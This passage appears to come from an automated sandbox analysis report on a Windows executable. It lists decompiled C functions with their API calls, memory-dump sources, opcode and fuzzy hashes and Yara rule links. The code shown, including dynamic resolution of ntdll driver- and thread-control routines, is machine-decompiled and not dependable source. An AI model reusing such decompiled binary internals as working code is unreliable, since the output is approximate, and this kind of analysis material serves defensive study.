                                                                                                        0x00409843
                                                                                                        0x00409846
                                                                                                        0x0040984b
                                                                                                        0x00409852
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00409854
                                                                                                        0x0040985d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040985d
                                                                                                        0x00409894
                                                                                                        0x00000000
                                                                                                        0x00409894

                                                                                                        APIs
                                                                                                          • Part of subcall function 00408E31: GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                          • Part of subcall function 00408E31: GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                        • ??2@YAPAXI@Z.MSVCRT ref: 004097F6
                                                                                                        • memset.MSVCRT ref: 00409805
                                                                                                        • memcpy.MSVCRT ref: 0040988A
                                                                                                        • memcpy.MSVCRT ref: 004098C0
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004098EC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: AddressProc$memcpy$??2@??3@HandleModulememset
                                                                                                        • String ID:
                                                                                                        • API String ID: 3641025914-0
                                                                                                        • Opcode ID: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                        • Instruction ID: bb54f3dbfe595cb11ae02f9551d523dabe65b88657fa4b418f7fa82d5da08bd9
                                                                                                        • Opcode Fuzzy Hash: 5e4299bbf46472c45a4c6d50f6a05ce4ddc252402b4fb65f630eed7603d777c4
                                                                                                        • Instruction Fuzzy Hash: BF41C172900209EFDB10EBA5C8819AEB3B9EF45304F14847FE545B3292DB78AE41CB59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004067AC, Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E004067AC(char** __edi) {
				void* __esi;
				void* _t9;
				void** _t11;
				char** _t15;
				char** _t24;
				void* _t25;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char** _t33;

				_t24 = __edi;
				 *__edi = "cf@";
				_t9 = E00406746(__edi);
				_t28 = __edi[5];
				if(_t28 != 0) {
					_t9 = E004055D1(_t9, _t28);
					_push(_t28);
					L0040B272();
				}
				_t29 = _t24[4];
				if(_t29 != 0) {
					_t9 = E004055D1(_t9, _t29);
					_push(_t29);
					L0040B272();
				}
				_t30 = _t24[3];
				if(_t30 != 0) {
					_t9 = E004055D1(_t9, _t30);
					_push(_t30);
					L0040B272();
				}
				_t31 = _t24[2];
				if(_t31 != 0) {
					E004055D1(_t9, _t31);
					_push(_t31);
					L0040B272();
				}
				_t15 = _t24;
				_pop(_t32);
				_push(_t24);
				_t33 = _t15;
				_t25 = 0;
				if(_t33[1] > 0 && _t33[0xd] > 0) {
					do {
						 *((intOrPtr*)( *((intOrPtr*)(E0040664E(_t33, _t25))) + 0xc))();
						_t25 = _t25 + 1;
					} while (_t25 < _t33[0xd]);
				}
				_t11 =  *( *_t33)();
				free( *_t11);
				return _t11;
			}














                                                                                                        0x004067ac
                                                                                                        0x004067af
                                                                                                        0x004067b5
                                                                                                        0x004067ba
                                                                                                        0x004067bf
                                                                                                        0x004067c1
                                                                                                        0x004067c6
                                                                                                        0x004067c7
                                                                                                        0x004067cc
                                                                                                        0x004067cd
                                                                                                        0x004067d2
                                                                                                        0x004067d4
                                                                                                        0x004067d9
                                                                                                        0x004067da
                                                                                                        0x004067df
                                                                                                        0x004067e0
                                                                                                        0x004067e5
                                                                                                        0x004067e7
                                                                                                        0x004067ec
                                                                                                        0x004067ed
                                                                                                        0x004067f2
                                                                                                        0x004067f3
                                                                                                        0x004067f8
                                                                                                        0x004067fa
                                                                                                        0x004067ff
                                                                                                        0x00406800
                                                                                                        0x00406805
                                                                                                        0x00406806
                                                                                                        0x00406808
                                                                                                        0x0040680f
                                                                                                        0x00406810
                                                                                                        0x00406812
                                                                                                        0x00406817
                                                                                                        0x0040681e
                                                                                                        0x00406828
                                                                                                        0x0040682b
                                                                                                        0x0040682c
                                                                                                        0x0040681e
                                                                                                        0x00406835
                                                                                                        0x00406839
                                                                                                        0x00406841

                                                                                                        APIs
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406752
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406760
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406771
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406788
                                                                                                          • Part of subcall function 00406746: ??3@YAXPAX@Z.MSVCRT ref: 00406791
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004067C7
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004067DA
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 004067ED
                                                                                                        • ??3@YAXPAX@Z.MSVCRT ref: 00406800
                                                                                                        • free.MSVCRT(00000000), ref: 00406839
                                                                                                          • Part of subcall function 004055D1: free.MSVCRT(?,00405843,00000000,?,00000000), ref: 004055DA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@$free
                                                                                                        • String ID:
                                                                                                        • API String ID: 2241099983-0
                                                                                                        • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                        • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                        • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                        • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                        0x00405d03
                                                                                                        0x00405d06
                                                                                                        0x00405d10
                                                                                                        0x00405d17
                                                                                                        0x00405d22
                                                                                                        0x00405d32
                                                                                                        0x00405d40
                                                                                                        0x00405d48
                                                                                                        0x00405d4e
                                                                                                        0x00405d54
                                                                                                        0x00405d59
                                                                                                        0x00405d5c
                                                                                                        0x00405d61
                                                                                                        0x00405d67

                                                                                                        APIs
                                                                                                        • GetParent.USER32(?), ref: 00405D0A
                                                                                                        • GetWindowRect.USER32 ref: 00405D17
                                                                                                        • GetClientRect.USER32 ref: 00405D22
                                                                                                        • MapWindowPoints.USER32 ref: 00405D32
                                                                                                        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientParentPoints
                                                                                                        • String ID:
                                                                                                        • API String ID: 4247780290-0
                                                                                                        • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                        • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                        • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                        • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 89%
                                                                                                        			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                        0x004083dc
                                                                                                        0x004083e2
                                                                                                        0x004083e9
                                                                                                        0x004083ea
                                                                                                        0x004083eb
                                                                                                        0x004083f3
                                                                                                        0x004083f6
                                                                                                        0x004083f8
                                                                                                        0x00408401
                                                                                                        0x00408404
                                                                                                        0x00408407
                                                                                                        0x00408409
                                                                                                        0x0040840c
                                                                                                        0x00408413
                                                                                                        0x0040841d
                                                                                                        0x00408427
                                                                                                        0x0040842c
                                                                                                        0x0040842f
                                                                                                        0x00408432
                                                                                                        0x00408435
                                                                                                        0x00408438
                                                                                                        0x00408439
                                                                                                        0x0040843e
                                                                                                        0x0040843f
                                                                                                        0x00408442
                                                                                                        0x0040844a

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpy$??2@??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 1252195045-0
                                                                                                        • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                        • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                        • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                        • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 76%
                                                                                                        			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                        0x00406746
                                                                                                        0x00406746
                                                                                                        0x0040674f
                                                                                                        0x00406751
                                                                                                        0x00406752
                                                                                                        0x00406757
                                                                                                        0x00406758
                                                                                                        0x0040675d
                                                                                                        0x0040675f
                                                                                                        0x00406760
                                                                                                        0x00406765
                                                                                                        0x00406766
                                                                                                        0x0040676e
                                                                                                        0x00406770
                                                                                                        0x00406771
                                                                                                        0x00406776
                                                                                                        0x00406777
                                                                                                        0x0040677f
                                                                                                        0x00406781
                                                                                                        0x00406785
                                                                                                        0x00406787
                                                                                                        0x00406788
                                                                                                        0x0040678e
                                                                                                        0x0040678e
                                                                                                        0x00406790
                                                                                                        0x00406791
                                                                                                        0x00406796
                                                                                                        0x00406798
                                                                                                        0x0040679e
                                                                                                        0x004067a1
                                                                                                        0x004067a4
                                                                                                        0x004067ab

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??3@
                                                                                                        • String ID:
                                                                                                        • API String ID: 613200358-0
                                                                                                        • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                        • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                        • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                        • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                        0x0040aba8
                                                                                                        0x0040aba9
                                                                                                        0x0040abb0
                                                                                                        0x0040abb2
                                                                                                        0x0040abb5
                                                                                                        0x0040ac19
                                                                                                        0x0040ac2c
                                                                                                        0x0040ac2e
                                                                                                        0x0040ac36
                                                                                                        0x0040ac39
                                                                                                        0x0040ac39
                                                                                                        0x0040ac1b
                                                                                                        0x0040ac21
                                                                                                        0x0040ac21
                                                                                                        0x0040abb7
                                                                                                        0x0040abcb
                                                                                                        0x0040abce
                                                                                                        0x0040abd7
                                                                                                        0x0040abe6
                                                                                                        0x0040abf6
                                                                                                        0x0040abfe
                                                                                                        0x0040ac09
                                                                                                        0x0040ac0f
                                                                                                        0x0040ac12
                                                                                                        0x0040ac4f

                                                                                                        APIs
                                                                                                        • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                          • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                          • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                          • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                        • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                        • String ID: $
                                                                                                        • API String ID: 2498372239-3993045852
                                                                                                        • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                        • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                        • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                        • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                        0x00403a7d
                                                                                                        0x00403a8c
                                                                                                        0x00403a9c
                                                                                                        0x00403aba
                                                                                                        0x00403adf
                                                                                                        0x00403ae7
                                                                                                        0x00403af4
                                                                                                        0x00403af4
                                                                                                        0x00403ae7
                                                                                                        0x00403aba
                                                                                                        0x00403a9c
                                                                                                        0x00403b13

                                                                                                        APIs
                                                                                                        • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                          • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                        • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: State$CallMessageProcSendWindow
                                                                                                        • String ID: A
                                                                                                        • API String ID: 3924021322-3554254475
                                                                                                        • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                        • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                        • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                        • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 91%
                                                                                                        			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                        0x004034f0
                                                                                                        0x004034f8
                                                                                                        0x00403506
                                                                                                        0x00403516
                                                                                                        0x0040351c
                                                                                                        0x00403531
                                                                                                        0x00403537
                                                                                                        0x00403545
                                                                                                        0x0040354a
                                                                                                        0x00403556
                                                                                                        0x00403567
                                                                                                        0x00403575
                                                                                                        0x00403583
                                                                                                        0x00403583
                                                                                                        0x00403586
                                                                                                        0x00403592
                                                                                                        0x00403598
                                                                                                        0x004035ac

                                                                                                        APIs
                                                                                                          • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                          • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                        • memset.MSVCRT ref: 00403537
                                                                                                        • _ultow.MSVCRT ref: 00403575
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ??2@$memset$_ultow
                                                                                                        • String ID: cf@$q
                                                                                                        • API String ID: 3448780718-2693627795
                                                                                                        • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                        • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                        • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                        • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                        0x00407e2d
                                                                                                        0x00407e46
                                                                                                        0x00407e48
                                                                                                        0x00407e4d
                                                                                                        0x00407e5f
                                                                                                        0x00407e6b
                                                                                                        0x00407e6f
                                                                                                        0x00407e75
                                                                                                        0x00407e7c
                                                                                                        0x00407e7d
                                                                                                        0x00407e88
                                                                                                        0x00407e8d
                                                                                                        0x00407e8e
                                                                                                        0x00407eaa

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00407E48
                                                                                                        • memset.MSVCRT ref: 00407E5F
                                                                                                          • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                          • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                        • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                        • String ID: </%s>
                                                                                                        • API String ID: 3400436232-259020660
                                                                                                        • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
